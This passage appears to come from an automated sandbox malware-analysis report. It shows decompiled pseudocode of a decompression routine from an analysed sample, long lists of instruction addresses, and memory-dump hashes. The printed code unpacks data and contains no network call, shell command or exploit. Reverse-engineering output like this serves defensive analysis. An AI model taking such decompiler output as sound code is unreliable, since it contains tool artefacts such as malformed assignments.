                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      												 *( *(__ebp - 0x68)) = __al;
                                      												__ecx =  *(__ebp - 0x14);
                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                      												__eax = __ecx + 1;
                                      												__edx = 0;
                                      												_t192 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t192;
                                      												goto L80;
                                      											case 0x1b:
                                      												L76:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													 *(__ebp - 0x88) = 0x1b;
                                      													goto L170;
                                      												}
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__edx =  *(__ebp - 8);
                                      												__cl =  *(__eax + __edx);
                                      												__eax =  *(__ebp - 0x14);
                                      												 *(__ebp - 0x5c) = __cl;
                                      												 *(__eax + __edx) = __cl;
                                      												__eax = __eax + 1;
                                      												__edx = 0;
                                      												_t275 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t275;
                                      												__eax =  *(__ebp - 0x68);
                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      												_t284 = __ebp - 0x64;
                                      												 *_t284 =  *(__ebp - 0x64) - 1;
                                      												__eflags =  *_t284;
                                      												 *( *(__ebp - 0x68)) = __cl;
                                      												L80:
                                      												 *(__ebp - 0x14) = __edx;
                                      												goto L81;
                                      											case 0x1c:
                                      												while(1) {
                                      													L123:
                                      													__eflags =  *(__ebp - 0x64);
                                      													if( *(__ebp - 0x64) == 0) {
                                      														break;
                                      													}
                                      													__eax =  *(__ebp - 0x14);
                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      													__eflags = __eax -  *(__ebp - 0x74);
                                      													if(__eax >=  *(__ebp - 0x74)) {
                                      														__eax = __eax +  *(__ebp - 0x74);
                                      														__eflags = __eax;
                                      													}
                                      													__edx =  *(__ebp - 8);
                                      													__cl =  *(__eax + __edx);
                                      													__eax =  *(__ebp - 0x14);
                                      													 *(__ebp - 0x5c) = __cl;
                                      													 *(__eax + __edx) = __cl;
                                      													__eax = __eax + 1;
                                      													__edx = 0;
                                      													_t414 = __eax %  *(__ebp - 0x74);
                                      													__eax = __eax /  *(__ebp - 0x74);
                                      													__edx = _t414;
                                      													__eax =  *(__ebp - 0x68);
                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      													__eflags =  *(__ebp - 0x30);
                                      													 *( *(__ebp - 0x68)) = __cl;
                                      													 *(__ebp - 0x14) = _t414;
                                      													if( *(__ebp - 0x30) > 0) {
                                      														continue;
                                      													} else {
                                      														L81:
                                      														 *(__ebp - 0x88) = 2;
                                      														goto L1;
                                      													}
                                      												}
                                      												 *(__ebp - 0x88) = 0x1c;
                                      												goto L170;
                                      										}
                                      									}
                                      									L171:
                                      									_t535 = _t534 | 0xffffffff;
                                      									goto L172;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					goto L1;
                                      				}
                                      			}













                                      0x00000000
                                      0x0040711c
                                      0x0040711c
                                      0x00407120
                                      0x0040712d
                                      0x00407137
                                      0x00000000
                                      0x00407122
                                      0x00407122
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00407056
                                      0x00407059
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x004073ce
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00406be3
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00000000
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00406dc8
                                      0x00000000
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x00000000
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x004073cb
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x004073cb
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00000000
                                      0x00407489
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407546
                                      0x00407447
                                      0x00000000
                                      0x00000000
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00407194
                                      0x00407197
                                      0x0040719a
                                      0x0040719c
                                      0x0040719e
                                      0x0040719e
                                      0x0040719f
                                      0x004071a2
                                      0x004071a9
                                      0x004071ac
                                      0x004071ba
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x00000000
                                      0x0040749f
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x00000000
                                      0x004075db
                                      0x004074a9
                                      0x004074ac
                                      0x004074af
                                      0x004074b3
                                      0x004074b6
                                      0x004074bc
                                      0x004074be
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x0040752b
                                      0x0040752e
                                      0x00407533
                                      0x00407534
                                      0x00407536
                                      0x00407538
                                      0x0040753b
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040744d
                                      0x00407447
                                      0x004074cd
                                      0x004074d3
                                      0x004074d6
                                      0x004074d9
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074eb
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x0040750d
                                      0x00407510
                                      0x00407514
                                      0x00407516
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074f8
                                      0x004074fd
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x0040751d
                                      0x00407524
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x00407526
                                      0x00000000
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x0040738e
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x004075fa
                                      0x004075fa
                                      0x00000000
                                      0x004075fa
                                      0x00407447
                                      0x004073ce
                                      0x004073cb
                                      0x00000000
                                      0x00407120

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                      • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                      • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                      • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00407068() {
                                      				unsigned short _t531;
                                      				signed int _t532;
                                      				void _t533;
                                      				signed int _t534;
                                      				signed int _t535;
                                      				signed int _t565;
                                      				signed int _t568;
                                      				signed int _t589;
                                      				signed int* _t606;
                                      				void* _t613;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t613 - 0x40) != 0) {
                                      						 *(_t613 - 0x84) = 0xa;
                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                      					} else {
                                      						 *(__ebp - 0x84) = 9;
                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      					}
                                      					while(1) {
                                      						 *(_t613 - 0x54) = _t606;
                                      						while(1) {
                                      							L133:
                                      							_t531 =  *_t606;
                                      							_t589 = _t531 & 0x0000ffff;
                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                      							if( *(_t613 - 0xc) >= _t565) {
                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                      								 *(_t613 - 0x40) = 1;
                                      								_t532 = _t531 - (_t531 >> 5);
                                      								 *_t606 = _t532;
                                      							} else {
                                      								 *(_t613 - 0x10) = _t565;
                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                      							}
                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                      								goto L139;
                                      							}
                                      							L137:
                                      							if( *(_t613 - 0x6c) == 0) {
                                      								 *(_t613 - 0x88) = 5;
                                      								L170:
                                      								_t568 = 0x22;
                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                      								_t535 = 0;
                                      								L172:
                                      								return _t535;
                                      							}
                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                      							L139:
                                      							_t533 =  *(_t613 - 0x84);
                                      							while(1) {
                                      								 *(_t613 - 0x88) = _t533;
                                      								while(1) {
                                      									L1:
                                      									_t534 =  *(_t613 - 0x88);
                                      									if(_t534 > 0x1c) {
                                      										break;
                                      									}
                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                      										case 0:
                                      											if( *(_t613 - 0x6c) == 0) {
                                      												goto L170;
                                      											}
                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      											_t534 =  *( *(_t613 - 0x70));
                                      											if(_t534 > 0xe1) {
                                      												goto L171;
                                      											}
                                      											_t538 = _t534 & 0x000000ff;
                                      											_push(0x2d);
                                      											asm("cdq");
                                      											_pop(_t570);
                                      											_push(9);
                                      											_pop(_t571);
                                      											_t609 = _t538 / _t570;
                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                      											asm("cdq");
                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                      											 *(_t613 - 0x3c) = _t604;
                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                      												L10:
                                      												if(_t612 == 0) {
                                      													L12:
                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      													goto L15;
                                      												} else {
                                      													goto L11;
                                      												}
                                      												do {
                                      													L11:
                                      													_t612 = _t612 - 1;
                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                      												} while (_t612 != 0);
                                      												goto L12;
                                      											}
                                      											if( *(_t613 - 4) != 0) {
                                      												GlobalFree( *(_t613 - 4));
                                      											}
                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                      											 *(_t613 - 4) = _t534;
                                      											if(_t534 == 0) {
                                      												goto L171;
                                      											} else {
                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                      												goto L10;
                                      											}
                                      										case 1:
                                      											L13:
                                      											__eflags =  *(_t613 - 0x6c);
                                      											if( *(_t613 - 0x6c) == 0) {
                                      												 *(_t613 - 0x88) = 1;
                                      												goto L170;
                                      											}
                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                      											_t45 = _t613 - 0x48;
                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                      											__eflags =  *_t45;
                                      											L15:
                                      											if( *(_t613 - 0x48) < 4) {
                                      												goto L13;
                                      											}
                                      											_t546 =  *(_t613 - 0x40);
                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                      												L20:
                                      												 *(_t613 - 0x48) = 5;
                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                      												goto L23;
                                      											}
                                      											 *(_t613 - 0x74) = _t546;
                                      											if( *(_t613 - 8) != 0) {
                                      												GlobalFree( *(_t613 - 8));
                                      											}
                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                      											 *(_t613 - 8) = _t534;
